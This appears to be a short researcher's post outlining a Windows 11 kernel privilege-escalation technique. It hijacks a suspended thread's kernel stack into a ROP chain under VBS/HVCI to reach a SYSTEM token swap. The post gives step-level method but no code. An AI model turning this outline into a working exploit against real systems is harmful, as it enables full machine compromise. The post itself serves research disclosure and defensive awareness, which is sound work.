Control Flow [Code Execution] in Windows 11 25h2 with VBS/HVCI

Arbitrary Code Execution achieved in Windows 11 25h22 with VBS/HVCI present via a R/W data attack abusing suspended threads.

Based on the data-only attack I shared last week that achieved a token swap to SYSTEM with VBS/HVCI present on the target. I started thinking about it and it let me a bitter-sweet feeling, code execution is the end-game always so I started researching ways of getting "arbitrary code execution" note the quotes, that part is important as we still are in VTL0, in kernel-land when VBS/HVCI is present. I ended up finding a project that used suspended threads to partially achieve this, but it was just a proof of concept (credits to Dmytro Oleksiuk aka Cr4sh) I have extended his work and added full chain support to execute the token swap. Voila !

More on this to come! As I'm researching a new novel technique I discovered while doing this project, that even bypasses kCET! This technique I'm showing here will not work if both kCET (Kernel Shadow Stack) and kCFG (Kernel Control Flow Guard) are present. But still, you should worry about it as at the moment kCET is off by default and it can only be turned on if your CPU allows it.

How it works? As I already explained the data-only attack I will only focus on the suspended thread technique
- Create a user thread; leaks its KTHREAD and KernelStack.
- Resumes the thread: KiApcInterrupt returns into the ROP Chain
- Find the return by offset
- ZwOpenProcess creates a kernel handle to PID 4, writes it into the kernel handle table
- ZwTerminateThread to close thread